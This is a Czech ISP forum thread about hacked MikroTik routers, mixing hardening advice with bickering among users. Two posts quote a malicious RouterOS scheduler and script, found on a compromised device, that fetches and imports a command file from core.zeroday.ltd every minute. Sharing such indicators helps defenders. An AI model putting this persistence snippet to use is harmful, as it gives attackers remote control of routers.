MikroTik - BEZPECNOSTNI UPOZORNENI !!! DULEZITE - zablokovane MikroTiky

[okoun]

protože dám ctrl+c a ctr+v dál neřeším pokud nějaký ftipálek odhlásí z newsu tak nevadí mám to dal dalších dovu emailů

[hapi]

měl si poslat jenom link na blog kde je vše.

[shooter]

https://www.exploit-db.com/vyhledej mikrotik

[shooter]

jakej je exploit na 5.x verzi měl jsem napadenej routr ale nevím jak když nic nikde nepíšou takže asi není všechno uveřejněny

[hocimin1]

tohle jsem dnes objevil na jednom RB SXT 5nD r2 verze 6.25.

Normalne se tam pak slo dostat z localu ne z WAN. Tak jsem to vsechno povypinal. Prehral na novejsi verzi.

Kód: Vybrat vše

/system scheduler
add disabled=yes interval=1m name=run1m on-event=fetch policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=\
    jan/09/1970 start-time=21:04:13
/system script
add name=fetch policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive source="\
    \n/tool fetch url=http://core.zeroday.ltd/command.rsc\
    \n/import file-name=command.rsc"



[mpcz]

Chtělo by to připojit i nějakou podrobnost, hlavně verzi, stroj, atd. mpcz, 5mar2019

[mladas]

tohle jsem dnes objevil na jednom RB SXT 5nD r2 verze 6.25.

Normalne se tam pak slo dostat z localu ne z WAN. Tak jsem to vsechno povypinal. Prehral na novejsi verzi.

Kód: Vybrat vše

/system scheduler
add disabled=yes interval=1m name=run1m on-event=fetch policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=\
    jan/09/1970 start-time=21:04:13
/system script
add name=fetch policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive source="\
    \n/tool fetch url=http://core.zeroday.ltd/command.rsc\
    \n/import file-name=command.rsc"



hlavne se ti tam pridalo par mangli a par veci do natu a vypnul se ti fitewall na input, tezari to jsou ale netusim kde se tam vzali

[dedek_2019]

Zdar chlapi,
řeším od léta 2018 něco podobného s neustálými útoky na všechny MTK, které spravuji. Finálním a zatím funkčním řešením prozatím byla blokace na INPUT všech zahraničních IP adres a také blokace portu 53 (opět na INPUT). Tím jsem se zbavil všech útoků a byl klid. Problém nastal, když jsem zjistil, že díky blokaci DNS (port 53) mi např. nefungují zálohy NAS na servery jako Amazon či Google Drive... A to už je celkem problém. Snažil jsem se tedy "pogooglit" IP adresy oněch serverů, na které zálohy probíhají (s tím, že je přidám do výjimek), ale bohužel bez úspěchu. Zřejmě nemám všechny. Zálohy jsem tedy nouzově řešil vždy dočasným vypnutím blokace DNS, ale ejhle, dnes po 5-ti minutách MTK "zasyflený". Resp. útočník nestihl nahrát žádný script, ale stihl mi smazat všechna pravidla na FW. Takže toto dočasné řešení je dost nebezpečné
Nemáte někdo jiný tip, jak toto obejít?

Díky moc,
Dědek.

[mirek.k]

Port 53 zvenku by neměl být potřeba, tedy měl by být zakázaný.
Jak to souvisí s NAS zálohami?

[DarkLogic]

Port 53 zvenku by neměl být potřeba, tedy měl by být zakázaný.
Jak to souvisí s NAS zálohami?

Asi zablokoval INPUT port 53 a nerozlisoval, jestli jde pozadavek z LAN nebo WAN.

[hapi]

to snad nemyslí vážně. Za chvíli se dozvíme že nezměnil hesla nebo má starý verze. Samozřejmě blokace dns zevnitř je blbost a nemusí se blokovat nic když není obsluha blbá a vypne "Allow remove Request" v nastevní DNS a upraví nastavení DHCP serveru aby dávalo třeba rovnou googlácký DNS. Jako škoda mluvit, začínám mít alergii na tyhle homo domo "síťaře". Moje rada zní, kup si router od UBNT.

[CrazyApe]

Zdar chlapi,
řeším od léta 2018 něco podobného s neustálými útoky na všechny MTK, které spravuji. Finálním a zatím funkčním řešením prozatím byla blokace na INPUT všech zahraničních IP adres a také blokace portu 53 (opět na INPUT). Tím jsem se zbavil všech útoků a byl klid. Problém nastal, když jsem zjistil, že díky blokaci DNS (port 53) mi např. nefungují zálohy NAS na servery jako Amazon či Google Drive... A to už je celkem problém. Snažil jsem se tedy "pogooglit" IP adresy oněch serverů, na které zálohy probíhají (s tím, že je přidám do výjimek), ale bohužel bez úspěchu. Zřejmě nemám všechny. Zálohy jsem tedy nouzově řešil vždy dočasným vypnutím blokace DNS, ale ejhle, dnes po 5-ti minutách MTK "zasyflený". Resp. útočník nestihl nahrát žádný script, ale stihl mi smazat všechna pravidla na FW. Takže toto dočasné řešení je dost nebezpečné
Nemáte někdo jiný tip, jak toto obejít?

Díky moc,
Dědek.

Problém je primárně v tom, že neumíte to zařízení nastavit. Tak jak psal někdo již níže doporučil bych aby jste si pořídil nějaký TP-Link, nebo Asus atp.. A nebo školení MikroTiku. Máme stovky kusů mikrotiků na veřejkách a nikdy žádnej problém. Takže začal bych asi tak:

- factory default
- netinstallem nejnovejší FW
- ponechat výchozí firewall z defconfu
- do něj přidat pravidlo na první místo input src adress (veřejka z které se na daný mikrotik potřebujete dostat z venku) port: 8291 protocol TCP+udp action accept
- nenastavovat DNS v ip-> DNS tam to nechat prázdné ale nastavit rozdávaní dns přimo z DHCP serveru (ip-> dhcp server-> network)
- ip services SSH,TELNET,FTP povolit jen z nejake adresy firewallem (opet pravidlo input src adress: x.x.x.x port x protocol acept)
- ip services WWW,API vypnout uplne
- nové heslo cisla,pismena + specialni znaky

To by mohlo pro začátek stačit.

[dedek_2019]

Hmm, tak díky za radu.... Jste fakt pašáci, poradili jste skvěle! Bylo rychlejší si najít tu drobnou chybku ve FW sám, než se jí dozvědět od vás.
Koukám, že podle osazenstva tohodle fóra, jsou zřejmě všichni méně zkušení uživatelé úplní idioti, co si neumí nastavit nový login...
Tak se tu bavte, "ajeťáci"

to snad nemyslí vážně. Za chvíli se dozvíme že nezměnil hesla nebo má starý verze. Samozřejmě blokace dns zevnitř je blbost a nemusí se blokovat nic když není obsluha blbá a vypne "Allow remove Request" v nastevní DNS a upraví nastavení DHCP serveru aby dávalo třeba rovnou googlácký DNS. Jako škoda mluvit, začínám mít alergii na tyhle homo domo "síťaře". Moje rada zní, kup si router od UBNT.

[Ladik]

Kdyby jsi si přečetl trošku z tohoto vlákna bylo by ti to jasné.
Navíc ti tu jasně poradili, to menší rýpnutí nepočítám.
A jak jsi na tu "malou" chybku ve fw přišel? A jak opravil? Přeprogramoval jsi ROS?
Díky za odpověď "ajeťáku".

[hapi]

Hmm, tak díky za radu.... Jste fakt pašáci, poradili jste skvěle! Bylo rychlejší si najít tu drobnou chybku ve FW sám, než se jí dozvědět od vás.
Koukám, že podle osazenstva tohodle fóra, jsou zřejmě všichni méně zkušení uživatelé úplní idioti, co si neumí nastavit nový login...
Tak se tu bavte, "ajeťáci"

to snad nemyslí vážně. Za chvíli se dozvíme že nezměnil hesla nebo má starý verze. Samozřejmě blokace dns zevnitř je blbost a nemusí se blokovat nic když není obsluha blbá a vypne "Allow remove Request" v nastevní DNS a upraví nastavení DHCP serveru aby dávalo třeba rovnou googlácký DNS. Jako škoda mluvit, začínám mít alergii na tyhle homo domo "síťaře". Moje rada zní, kup si router od UBNT.

kámo... co čteš v levém horní rohu tohohle fora? já tam čtu "poskytovatelé sobě" a už jenom fakt že se to tady jmenuje "ispforum" jaksi naznačuje že by se tu měli srocovat ISPíci což by mělo značit jistou úroveň znalostí která určitě zahrnuje správně zablokovat DNS dotazy z internetu velmi prostým pravidlem ve firewallu. Tim chci naznačit že tu neni support pro lidi jako si ty a proto se ti ani nikdo nesnažil polopatě napsat řešení.